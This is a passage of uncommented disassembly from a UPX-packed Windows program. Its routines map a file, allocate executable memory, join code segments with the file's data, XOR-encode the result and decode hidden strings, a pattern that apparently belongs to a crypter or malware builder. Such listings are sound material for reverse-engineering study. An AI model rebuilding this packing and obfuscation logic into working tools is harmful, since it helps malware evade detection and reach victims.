mov [eax+0Ch], ecx
mov [eax+10h], ecx
retn
sub_406CB0 endp
; ---------------------------------------------------------------------------
align 10h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
sub_406CE0 proc near ; CODE XREF: sub_406B60+5C�p
push esi
mov esi, ecx
call dword_4240E4 ; GetTickCount
mov [esi+0Ch], eax
mov dword ptr [esi+10h], 1
pop esi
retn
sub_406CE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406D00 proc near ; CODE XREF: sub_408A20+45�p
arg_0 = dword ptr 4
mov eax, ecx
mov ecx, [esp+arg_0]
mov [eax+3Ch], ecx
xor ecx, ecx
push esi
mov dword ptr [eax], offset off_424464
mov [eax+4], ecx
mov [eax+8], ecx
mov [eax+0Ch], ecx
mov [eax+10h], ecx
mov [eax+14h], ecx
mov [eax+18h], ecx
mov [eax+1Ch], ecx
mov [eax+20h], ecx
mov [eax+24h], ecx
mov [eax+28h], ecx
mov [eax+2Ch], ecx
mov [eax+30h], ecx
mov [eax+34h], ecx
mov [eax+58h], ecx
mov [eax+38h], ecx
xor edx, edx
lea esi, [eax+48h]
mov [esi], edx
mov [esi+4], edx
mov [esi+8], edx
mov [esi+0Ch], edx
mov [eax+40h], ecx
mov [eax+44h], ecx
pop esi
retn 4
sub_406D00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406D60 proc near ; CODE XREF: sub_407450+78�p
var_44 = byte ptr -44h
var_4 = dword ptr -4
sub esp, 44h
mov eax, dword_42A290
push esi
mov [esp+48h+var_4], eax
push edi
mov edi, ecx
mov eax, [edi+18h]
mov ecx, [edi+4Ch]
mov edx, [edi+2Ch]
mov [eax+ecx+4], edx
mov eax, [edi+18h]
mov ecx, [edi+4Ch]
mov dword ptr [eax+ecx+8], 0AAAAAAAAh
mov eax, [edi+38h]
lea edx, [esp+4Ch+var_44]
push edx
add eax, 108h
push eax
call sub_40EEF0
lea eax, [esp+54h+var_44]
add esp, 8
lea edx, [eax+1]
loc_406DA8: ; CODE XREF: sub_406D60+4D�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_406DA8
sub eax, edx
mov edx, [edi+18h]
lea ecx, [eax+1]
mov eax, [edi+4Ch]
lea edi, [edx+eax+0Ch]
mov edx, ecx
shr ecx, 2
lea esi, [esp+4Ch+var_44]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov ecx, [esp+4Ch+var_4]
pop edi
pop esi
call sub_4192B6
add esp, 44h
retn
sub_406D60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406DE0 proc near ; CODE XREF: sub_407450+80�p
arg_0 = dword ptr 4
mov eax, [ecx+1Ch]
test eax, eax
jz short locret_406E12
push esi
mov esi, [ecx+24h]
xor edx, edx
test esi, 0FFFFFFFCh
jbe short loc_406E11
mov esi, [esp+4+arg_0]
push edi
lea ebx, [ebx+0]
loc_406E00: ; CODE XREF: sub_406DE0+2E�j
xor [eax], esi
mov edi, [ecx+24h]
add eax, 4
inc edx
shr edi, 2
cmp edx, edi
jb short loc_406E00
pop edi
loc_406E11: ; CODE XREF: sub_406DE0+13�j
pop esi
locret_406E12: ; CODE XREF: sub_406DE0+5�j
retn 4
sub_406DE0 endp
; ---------------------------------------------------------------------------
align 10h
loc_406E20: ; CODE XREF: sub_407450+F1�p
push ebx
push ebp
mov ebp, ecx
mov eax, [ebp+38h]
mov byte ptr [eax+310h], 0
mov ecx, [ebp+38h]
mov byte ptr [ecx+414h], 0
mov edx, [ebp+38h]
push esi
add edx, 310h
push edi
push edx
call sub_40E760
add esp, 4
push 5
push offset dword_429178
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
nop
loc_406E60: ; CODE XREF: UPX0:00406E65�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_406E60
mov edi, [ebp+38h]
sub eax, ecx
mov esi, ecx
add edi, 30Fh
loc_406E74: ; CODE XREF: UPX0:00406E7A�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_406E74
mov ebx, dword_42408C
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 7
rep movsb
call ebx ; Sleep
mov eax, [ebp+38h]
add eax, 414h
push eax
call sub_40E760
add esp, 4
push 9
push offset dword_429180
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
loc_406EB8: ; CODE XREF: UPX0:00406EBD�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_406EB8
mov edi, [ebp+38h]
sub eax, ecx
mov esi, ecx
add edi, 413h
lea esp, [esp+0]
loc_406ED0: ; CODE XREF: UPX0:00406ED6�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_406ED0
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
push 0Ah
rep movsb
call ebx ; Sleep
mov ecx, [ebp+38h]
add ecx, 518h
push ecx
call sub_40E760
add esp, 4
push 0Dh
push offset dword_42918C
mov ecx, offset off_42AE60
call sub_406AE0
mov ecx, eax
nop
loc_406F10: ; CODE XREF: UPX0:00406F15�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_406F10
mov edi, [ebp+38h]
sub eax, ecx
mov esi, ecx
add edi, 517h
loc_406F24: ; CODE XREF: UPX0:00406F2A�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_406F24
mov ecx, eax
shr ecx, 2
rep movsd
push 0
push 80h
push 3
mov ecx, eax
push 0
and ecx, 3
rep movsb
mov edx, [ebp+38h]
push 1
push 80000000h
add edx, 108h
push edx
call dword_424074 ; CreateFileA
push 0
push 0
push 0
push 2
mov esi, eax
push 0
push esi
call dword_4240F0 ; CreateFileMappingA
push 0
push 0
push 0
mov ebx, eax
push 4
push ebx
call dword_4240EC ; MapViewOfFile
push 0
push esi
mov edi, eax
call dword_4240BC ; GetFileSize
test edi, edi
mov [ebp+2Ch], eax
jz short loc_407007
test eax, eax
jz short loc_407007
add eax, 40h
push eax
mov eax, [ebp+38h]
add eax, 64Ch
push eax
call sub_404550
mov ecx, [ebp+2Ch]
mov edx, [ebp+38h]
add ecx, 40h
push ecx
add edx, 65Ch
push edx
call sub_404550
mov eax, [ebp+2Ch]
mov ecx, [ebp+38h]
add eax, 40h
push eax
add ecx, 66Ch
push ecx
call sub_404550
mov edx, [ebp+2Ch]
mov eax, [ebp+38h]
push edx
add eax, 64Ch
push edi
push eax
call sub_4045B0
add esp, 24h
push edi
call dword_4240E8 ; UnmapViewOfFile
mov edi, dword_42406C
push ebx
call edi ; CloseHandle
push esi
call edi ; CloseHandle
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
retn
; ---------------------------------------------------------------------------
loc_407007: ; CODE XREF: UPX0:00406F90�j
; UPX0:00406F94�j
push 0
push 0
call sub_41A2B3
; ---------------------------------------------------------------------------
db 10h dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_407020 proc near ; CODE XREF: sub_407450+32�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
sub esp, 10h
mov ecx, [esp+10h+arg_8]
push ebx
mov ebx, [esp+14h+arg_C]
push ebp
push esi
push edi
xor ebp, ebp
xor edi, edi
xor esi, esi
xor edx, edx
xor eax, eax
cmp ecx, ebx
mov [esp+20h+var_4], ebp
jz short loc_40706D
mov ebp, [esp+20h+arg_4]
loc_407045: ; CODE XREF: sub_407020+43�j
cmp [ecx], ebp
jnz short loc_40705F
test edi, edi
jnz short loc_407051
mov edi, eax
jmp short loc_40705F
; ---------------------------------------------------------------------------
loc_407051: ; CODE XREF: sub_407020+2B�j
test esi, esi
jnz short loc_407059
mov esi, eax
jmp short loc_40705F
; ---------------------------------------------------------------------------
loc_407059: ; CODE XREF: sub_407020+33�j
test edx, edx
jnz short loc_40706B
mov edx, eax
loc_40705F: ; CODE XREF: sub_407020+27�j
; sub_407020+2F�j ...
inc ecx
inc eax
cmp ecx, ebx
jnz short loc_407045
mov ebp, [esp+20h+var_4]
jmp short loc_40706D
; ---------------------------------------------------------------------------
loc_40706B: ; CODE XREF: sub_407020+3B�j
mov ebp, eax
loc_40706D: ; CODE XREF: sub_407020+1F�j
; sub_407020+49�j
mov eax, [esp+20h+arg_0]
mov ecx, eax
mov [ecx], edi
mov [ecx+4], esi
pop edi
mov [ecx+8], edx
loc_40707C: ; DATA XREF: UPX0:004284CC�o
; UPX0:004284E0�o ...
pop esi
mov [ecx+0Ch], ebp
pop ebp
pop ebx
add esp, 10h
retn
sub_407020 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407090 proc near ; CODE XREF: sub_407140+FD�p
; sub_4085A0+84�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
push ebx
mov ebx, [esp+4+arg_0]
push edi
lea eax, [esp+8+arg_8]
push eax
push ecx
lea edx, [esp+10h+arg_0]
push 1
push edx
mov dword ptr [ebx], offset off_424468
call sub_41A2ED
mov edi, eax
add esp, 10h
inc edi
jnz short loc_4070D2
mov eax, [esp+8+arg_4]
lea edx, [ebx+4]
sub edx, eax
loc_4070C3: ; CODE XREF: sub_407090+3B�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_4070C3
pop edi
mov eax, ebx
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4070D2: ; CODE XREF: sub_407090+28�j
push esi
push edi
call sub_4191BC
mov ecx, [esp+10h+arg_4]
mov esi, eax
lea eax, [esp+10h+arg_8]
push eax
push ecx
push edi
push esi
call sub_41A2ED
lea edx, [ebx+4]
add esp, 14h
mov eax, esi
sub edx, esi
loc_4070F6: ; CODE XREF: sub_407090+6E�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_4070F6
push esi
call sub_4198AE
add esp, 4
pop esi
pop edi
mov eax, ebx
pop ebx
retn
sub_407090 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407110 proc near ; DATA XREF: UPX0:0042446C�o
lea eax, [ecx+4]
retn
sub_407110 endp
; ---------------------------------------------------------------------------
align 10h
loc_407120: ; DATA XREF: UPX0:off_424464�o
test byte ptr [esp+4], 1
push esi
mov esi, ecx
mov dword ptr [esi], offset off_424464
jz short loc_407139
push esi
call sub_41930D
add esp, 4
loc_407139: ; CODE XREF: UPX0:0040712E�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407140 proc near ; CODE XREF: sub_4075D0+1C�p
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = byte ptr -310h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
mov eax, large fs:0
push 0FFFFFFFFh
push offset SEH_407140
push eax
mov large fs:0, esp
sub esp, 314h
push ebx
mov ebx, ecx
mov eax, [ebx+40h]
test eax, eax
jnz loc_407355
push esi
mov esi, [esp+328h+arg_0]
push 658h
mov [ebx+38h], esi
call sub_4191C1
add esp, 4
mov [esp+328h+var_320], eax
test eax, eax
mov [esp+328h+var_4], 0
jz short loc_4071A5
mov ecx, [ebx+38h]
mov edx, [ebx+3Ch]
push ecx
push edx
mov ecx, eax
call sub_40AC50
jmp short loc_4071A7
; ---------------------------------------------------------------------------
loc_4071A5: ; CODE XREF: sub_407140+52�j
xor eax, eax
loc_4071A7: ; CODE XREF: sub_407140+63�j
push ebp
push 0
push 80h
push 3
push 0
push 1
push 80000000h
add esi, 108h
push esi
mov [esp+348h+var_4], 0FFFFFFFFh
mov [ebx+58h], eax
mov dword ptr [ebx+4], offset loc_401030
mov dword ptr [ebx+8], offset loc_401074
mov dword ptr [ebx+0Ch], 4019B8h
mov dword ptr [ebx+10h], 4019B0h
mov dword ptr [ebx+14h], 4019B0h
call dword_424074 ; CreateFileA
push 0
push 0
push 0
push 2
mov ebp, eax
push 0
push ebp
call dword_4240F0 ; CreateFileMappingA
push 0
push 0
push 0
push 4
push eax
mov [esp+338h+var_318], eax
call dword_4240EC ; MapViewOfFile
test eax, eax
mov [esp+324h+var_314], eax
jnz short loc_407254
push 19h
push offset dword_42915C
mov ecx, offset off_42AE60
call sub_406AE0
push eax
lea eax, [esp+328h+var_310]
push eax
call sub_407090
add esp, 8
push offset dword_42643C
lea ecx, [esp+328h+var_310]
push ecx
call sub_41A2B3
loc_407254: ; CODE XREF: sub_407140+E4�j
push edi
push 0
push ebp
call dword_4240BC ; GetFileSize
mov edx, [ebx+4]
mov ecx, [ebx+10h]
mov edi, [ebx+14h]
sub ecx, edx
mov edx, [ebx+0Ch]
sub edx, edi
mov [ebx+34h], edx
push 40h
add edx, ecx
push 3000h
lea edx, [edx+eax+32h]
push edx
push 0
mov [ebx+2Ch], eax
mov [ebx+30h], ecx
call dword_4240F4 ; VirtualAlloc
mov ecx, [ebx+30h]
mov edi, eax
mov eax, [ebx+34h]
add eax, ecx
mov ecx, [ebx+2Ch]
lea ecx, [eax+ecx+32h]
mov edx, ecx
shr ecx, 2
mov [ebx+18h], edi
xor eax, eax
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
mov ecx, [ebx+30h]
mov esi, [ebx+4]
mov edi, [ebx+18h]
mov eax, ecx
shr ecx, 2
rep movsd
mov edx, [esp+330h+var_31C]
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebx+30h]
mov edi, [ebx+18h]
mov ecx, [ebx+2Ch]
add edi, eax
mov eax, ecx
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebx+30h]
mov edi, [ebx+18h]
mov ecx, [ebx+34h]
mov esi, [ebx+14h]
add edi, eax
add edi, [ebx+2Ch]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebx+2Ch]
mov ecx, [ebx+4]
mov edi, [ebx+0Ch]
mov esi, eax
sub esi, ecx
add esi, edi
mov edi, [ebx+14h]
mov [ebx+20h], esi
mov esi, [ebx+8]
sub eax, esi
add eax, edi
mov [ebx+24h], eax
mov eax, esi
sub eax, ecx
mov ecx, [ebx+18h]
add ecx, eax
push edx
mov [ebx+28h], eax
mov [ebx+1Ch], ecx
call dword_4240E8 ; UnmapViewOfFile
mov edx, [esp+330h+var_320]
mov esi, dword_42406C
push edx
call esi ; CloseHandle
push ebp
call esi ; CloseHandle
pop edi
pop ebp
mov dword ptr [ebx+40h], 1
pop esi
loc_407355: ; CODE XREF: sub_407140+23�j
mov ecx, [esp+324h+var_C]
pop ebx
mov large fs:0, ecx
add esp, 320h
retn 4
sub_407140 endp
; ---------------------------------------------------------------------------
align 10h
mov edx, [esp+4]
mov eax, ecx
push esi
push edi
mov dword ptr [eax], offset off_424468
lea esi, [edx+4]
lea edi, [eax+4]
mov ecx, 40h
rep movsd
mov ecx, [edx+104h]
mov [eax+104h], ecx
mov ecx, [edx+108h]
mov [eax+108h], ecx
lea esi, [edx+10Ch]
lea edi, [eax+10Ch]
mov ecx, 40h
rep movsd
lea esi, [edx+20Ch]
lea edi, [eax+20Ch]
mov ecx, 40h
rep movsd
pop edi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
loc_4073D0: ; DATA XREF: UPX0:00426440�o
mov dword ptr [ecx], offset off_424468
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4073E0 proc near ; CODE XREF: UPX0:004086D3�p
push esi
mov esi, ecx
mov eax, [esi+40h]
push edi
xor edi, edi
cmp eax, edi
jz short loc_407444
mov eax, [esi+18h]
push 8000h
push edi
push eax
call dword_4240F8 ; VirtualFree
mov [esi+4], edi
mov [esi+8], edi
mov [esi+0Ch], edi
mov [esi+10h], edi
mov [esi+14h], edi
mov [esi+18h], edi
mov [esi+1Ch], edi
mov [esi+20h], edi
mov [esi+24h], edi
mov [esi+28h], edi
mov [esi+2Ch], edi
mov [esi+30h], edi
mov [esi+34h], edi
mov [esi+40h], edi
mov [esi+44h], edi
mov [esi+3Ch], edi
mov esi, [esi+58h]
cmp esi, edi
jz short loc_407444
mov ecx, esi
call sub_40B140
push esi
call sub_41930D
add esp, 4
loc_407444: ; CODE XREF: sub_4073E0+B�j
; sub_4073E0+52�j
pop edi
pop esi
retn
sub_4073E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407450 proc near ; CODE XREF: sub_407630+A�j
var_10 = byte ptr -10h
var_4 = dword ptr -4
sub esp, 10h
push esi
mov esi, ecx
mov eax, [esi+40h]
test eax, eax
jnz short loc_407466
push 0
push 0
call sub_41A2B3
loc_407466: ; CODE XREF: sub_407450+B�j
mov eax, [esi+20h]
mov ecx, [esi+38h]
mov edx, [ecx+6D4h]
push ebx
push ebp
push edi
mov edi, [esi+18h]
add eax, edi
push eax
push edi
push edx
lea eax, [esp+2Ch+var_10]
push eax
call sub_407020
mov ecx, [eax+0Ch]
mov edx, [eax]
mov ebx, [eax+4]
mov ebp, [eax+8]
mov [esp+30h+var_4], ecx
lea ecx, [esi+48h]
mov eax, ecx
mov [eax], edx
mov edx, [esp+30h+var_4]
mov [eax+4], ebx
mov [eax+8], ebp
mov [eax+0Ch], edx
mov ecx, [ecx]
add esp, 10h
test ecx, ecx
jz loc_4075A4
mov eax, [esi+4Ch]
test eax, eax
jz loc_4075A4
mov edi, [ecx+edi+4]
mov ecx, esi
call sub_406D60
push edi
mov ecx, esi
call sub_406DE0
mov ecx, [esi+58h]
push esi
call sub_40AEA0
mov ecx, [esi+58h]
call sub_40B060
mov eax, [esi+38h]
mov ecx, [esi+58h]
push 9
push offset byte_4243C3
lea edx, [eax+68Ch]
push edx
add eax, 67Ch
push eax
lea eax, [ecx+224h]
push eax
add ecx, 1Ch
push ecx
call sub_4165C0
mov eax, [esi+38h]
mov ecx, [esi+58h]
push 9
lea edx, [eax+6ACh]
push edx
lea edx, [eax+69Ch]
push edx
add eax, 67Ch
push eax
lea eax, [ecx+42Ch]
push eax
add ecx, 1Ch
push ecx
call sub_4165C0
add esp, 30h
mov ecx, esi
call loc_406E20
test eax, eax
jz short loc_4075A4
mov eax, [esi+38h]
push 9
push offset byte_4243C3
lea ecx, [eax+65Ch]
push ecx
lea edx, [eax+64Ch]
push edx
lea ecx, [eax+414h]
push ecx
add eax, 310h
push eax
call sub_4165C0
mov esi, [esi+38h]
push 9
lea edx, [esi+6ACh]
push edx
lea eax, [esi+66Ch]
push eax
lea ecx, [esi+64Ch]
push ecx
lea edx, [esi+518h]
push edx
add esi, 310h
push esi
call sub_4165C0
add esp, 30h
loc_4075A4: ; CODE XREF: sub_407450+61�j
; sub_407450+6C�j ...
pop edi
pop ebp
pop ebx
pop esi
add esp, 10h
retn
sub_407450 endp
; ---------------------------------------------------------------------------
align 10h
loc_4075B0: ; DATA XREF: UPX0:off_424468�o
test byte ptr [esp+4], 1
push esi
mov esi, ecx
mov dword ptr [esi], offset off_424468
jz short loc_4075C9
push esi
call sub_41930D
add esp, 4
loc_4075C9: ; CODE XREF: UPX0:004075BE�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4075D0 proc near ; CODE XREF: sub_40C7C0+A5�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
mov eax, [esi+18h]
test eax, eax
jnz short loc_40762A
mov eax, [esp+4+arg_4]
mov ecx, [esi+0Ch]
mov [esi+8], eax
mov eax, [esp+4+arg_0]
push eax
mov [esi+10h], eax
call sub_407140
mov eax, 1
push 40h
mov [esi+18h], eax
mov [esi+1Ch], eax
call sub_4191BC
add esp, 4
push 10h
push offset loc_4291BC
mov ecx, offset off_42AE60
mov [esi+2Ch], eax
call sub_406AE0
mov esi, [esi+2Ch]
lea ecx, [ecx+0]
loc_407620: ; CODE XREF: sub_4075D0+58�j
mov cl, [eax]
inc eax
mov [esi], cl
inc esi
test cl, cl
jnz short loc_407620
loc_40762A: ; CODE XREF: sub_4075D0+8�j
pop esi
retn 8
sub_4075D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_407630 proc near ; CODE XREF: sub_40C950+10A�p
mov eax, [ecx+18h]
test eax, eax
jz short locret_40763F
mov ecx, [ecx+0Ch]
jmp sub_407450
; ---------------------------------------------------------------------------
locret_40763F: ; CODE XREF: sub_407630+5�j
retn
sub_407630 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407640 proc near ; CODE XREF: sub_407F40+96�p
; sub_407F40+DC�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_24 = byte ptr 2Ch
arg_A4 = byte ptr 0ACh
arg_124 = byte ptr 12Ch
arg_228 = byte ptr 230h
arg_32C = byte ptr 334h
arg_430 = word ptr 438h
arg_432 = byte ptr 43Ah
arg_438 = byte ptr 440h
arg_53C = byte ptr 544h
arg_640 = byte ptr 648h
arg_744 = byte ptr 74Ch
arg_848 = byte ptr 850h
arg_94C = dword ptr 954h
arg_954 = word ptr 95Ch
arg_95C = word ptr 964h
arg_964 = byte ptr 96Ch
arg_9E4 = dword ptr 9ECh
arg_9E8 = dword ptr 9F0h
arg_9EC = byte ptr 9F4h
arg_19F0 = dword ptr 19F8h
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
mov eax, 19FCh
call sub_4192D0
mov eax, dword_42A290
push ebx
mov [esp+4+arg_19F0], eax
mov eax, [ebp+arg_0]
test eax, eax
push esi
push edi
mov [esp+10h], ecx
jz loc_407E00
mov ebx, [ebp+arg_C]
test ebx, ebx
jz loc_407E00
mov esi, [ebp+arg_8]
test esi, esi
jz loc_407E00
mov eax, [ecx+18h]
test eax, eax
jz loc_407E00
xor eax, eax
mov ecx, 232h
lea edi, [esp+0Ch+arg_124]
rep stosd
mov eax, [ebp+arg_10]
mov [esp+0Ch+arg_9E4], eax
mov eax, [ebp+arg_0]
lea edx, [esp+0Ch+arg_124]
mov ecx, eax
sub edx, ecx
loc_4076B7: ; CODE XREF: sub_407640+7F�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_4076B7
lea edx, [esp+0Ch+arg_228]
mov eax, esi
sub edx, esi
lea esp, [esp+0]
loc_4076D0: ; CODE XREF: sub_407640+98�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_4076D0
lea edx, [esp+0Ch+arg_32C]
mov eax, ebx
sub edx, ebx
loc_4076E5: ; CODE XREF: sub_407640+AD�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_4076E5
mov eax, [ebp+arg_4]
test eax, eax
mov ecx, [ebp+arg_14]
mov [esp+0Ch+arg_9E8], ecx
jnz short loc_40771C
mov edx, [esp+10h]
mov eax, [edx+2Ch]
lea edx, [esp+0Ch+arg_848]
sub edx, eax
loc_407710: ; CODE XREF: sub_407640+D8�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_407710
jmp short loc_40772F
; ---------------------------------------------------------------------------
loc_40771C: ; CODE XREF: sub_407640+BE�j
lea edx, [esp+0Ch+arg_848]
sub edx, eax
loc_407725: ; CODE XREF: sub_407640+ED�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_407725
loc_40772F: ; CODE XREF: sub_407640+DA�j
mov edx, [ebp+arg_0]
mov eax, 33h
mov [esp+0Ch+arg_95C], ax
mov [esp+0Ch+arg_954], ax
lea eax, [esp+0Ch+arg_24]
push eax
lea ecx, [esp+10h+arg_A4]
push ecx
push edx
mov [esp+18h+arg_94C], 1
call sub_40F030
add esp, 0Ch
test eax, eax
jz loc_407E00
lea eax, [esp+0Ch+arg_24]
push eax
call sub_40D720
add esp, 4
test eax, eax
jz loc_407BFA
lea ecx, [esp+0Ch+arg_A4]
push ecx
call sub_40D8F0
add esp, 4
test eax, eax
jz loc_407BCF
lea edx, [esp+0Ch+arg_24]
push edx
call sub_40F110
add esp, 4
test eax, eax
jz loc_407BFA
mov ecx, [esp+10h]
mov ebx, [ecx+8]
mov ecx, [ebx+7108h]
test ecx, ecx
mov eax, 1
mov [esp+0Ch+arg_0], eax
jnz loc_407950
mov ecx, [ebx+710Ch]
test ecx, ecx
jle loc_407950
mov edx, [esp+10h]
mov esi, [edx+1Ch]
test esi, esi
jle loc_407950
cmp [edx+1Ch], ecx
jge loc_407950
mov edi, edx
mov eax, [edi+1Ch]
shl eax, 7
lea esi, [eax+ebx]
lea eax, [esi+4]
lea edx, [esp+0Ch+arg_438]
sub edx, eax
lea ecx, [ecx+0]
loc_407810: ; CODE XREF: sub_407640+1D8�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_407810
lea eax, [esi+2004h]
lea edx, [esp+0Ch+arg_53C]
sub edx, eax
lea esp, [esp+0]
loc_407830: ; CODE XREF: sub_407640+1F8�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_407830
mov ecx, [edi+1Ch]
shl ecx, 6
lea esi, [ecx+ebx]
lea eax, [esi+4004h]
lea edx, [esp+0Ch+arg_964]
sub edx, eax
loc_407852: ; CODE XREF: sub_407640+21A�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_407852
lea edx, [esi+6004h]
mov edi, offset byte_4243C3
mov esi, edx
mov ecx, 1
xor eax, eax
repe cmpsb
lea esi, [esp+0Ch+arg_640]
jnz short loc_40788F
lea eax, [ebx+6004h]
sub esi, eax
loc_407883: ; CODE XREF: sub_407640+24B�j
mov cl, [eax]
mov [esi+eax], cl
inc eax
test cl, cl
jnz short loc_407883
jmp short loc_40789D
; ---------------------------------------------------------------------------
loc_40788F: ; CODE XREF: sub_407640+239�j
mov eax, edx
sub esi, edx
loc_407893: ; CODE XREF: sub_407640+25B�j
mov cl, [eax]
mov [esi+eax], cl
inc eax
test cl, cl
jnz short loc_407893
loc_40789D: ; CODE XREF: sub_407640+24D�j
xor eax, eax
mov edi, offset byte_4243C3
mov esi, edx
mov ecx, 1
repe cmpsb
lea esi, [esp+0Ch+arg_744]
mov eax, edx
jnz short loc_4078CC
sub esi, edx
lea ebx, [ebx+0]
loc_4078C0: ; CODE XREF: sub_407640+288�j
mov cl, [eax]
mov [esi+eax], cl
inc eax
test cl, cl
jnz short loc_4078C0
jmp short loc_4078DA
; ---------------------------------------------------------------------------
loc_4078CC: ; CODE XREF: sub_407640+276�j
sub esi, edx
mov edi, edi
loc_4078D0: ; CODE XREF: sub_407640+298�j
mov cl, [eax]
mov [esi+eax], cl
inc eax
test cl, cl
jnz short loc_4078D0
loc_4078DA: ; CODE XREF: sub_407640+28A�j
mov esi, [esp+10h]
mov eax, [esi+1Ch]
mov ecx, [ebx+eax*4+7004h]
push ecx
lea edx, [esp+10h+arg_14]
push offset dword_4243F0
push edx
call sub_419B8A
add esp, 0Ch
xor edi, edi
xor eax, eax
nop
loc_407900: ; CODE XREF: sub_407640+2CE�j
mov cl, byte ptr [esp+eax+0Ch+arg_14]
mov byte ptr [esp+eax+0Ch+arg_430], cl
inc eax
test cl, cl
jnz short loc_407900
mov eax, [esi+10h]
cmp [eax+6CCh], edi
jz loc_407A32
mov ebx, [ebp+arg_10]
mov esi, [ebp+arg_14]
lea ecx, [esp+0Ch+arg_124]
mov [ebx+8], edi
push ecx
mov [esi+8], edi
call sub_412210
add esp, 4
cmp eax, edi
mov [ebx+8], edi
mov [esp+0Ch+arg_0], eax
mov [esi+8], edi
jz short loc_407950
mov edx, [esp+10h]
mov [edx+1Ch], edi
loc_407950: ; CODE XREF: sub_407640+18A�j
; sub_407640+198�j ...
mov ecx, [esp+10h]
mov edx, [ecx+8]
mov ecx, [edx+7108h]
test ecx, ecx
mov [esp+0Ch+arg_8], 1
jnz loc_407B50
mov [esp+0Ch+arg_C], 40h
mov [esp+0Ch+arg_4], 80h
mov [esp+0Ch+arg_10], 7008h
loc_407985: ; CODE XREF: sub_407640+4F5�j
test eax, eax
jz loc_407B54
mov ecx, [esp+10h]
mov ebx, [ecx+8]
mov edx, [esp+0Ch+arg_8]
cmp edx, [ebx+710Ch]
jge loc_407B50
mov esi, [esp+0Ch+arg_4]
lea eax, [ebx+esi+4]
lea edx, [esp+0Ch+arg_438]
sub edx, eax
loc_4079B5: ; CODE XREF: sub_407640+37D�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_4079B5
lea eax, [ebx+esi+2004h]
lea edx, [esp+0Ch+arg_53C]
sub edx, eax
nop
loc_4079D0: ; CODE XREF: sub_407640+398�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_4079D0
mov eax, [esp+0Ch+arg_C]
lea eax, [ebx+eax+4004h]
lea edx, [esp+0Ch+arg_964]
sub edx, eax
mov edi, edi
loc_4079F0: ; CODE XREF: sub_407640+3B8�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_4079F0
mov ecx, [esp+0Ch+arg_C]
lea edx, [ebx+ecx+6004h]
mov edi, offset byte_4243C3
mov esi, edx
mov ecx, 1
xor eax, eax
repe cmpsb
lea esi, [esp+0Ch+arg_640]
jnz short loc_407A3D
lea eax, [ebx+6004h]
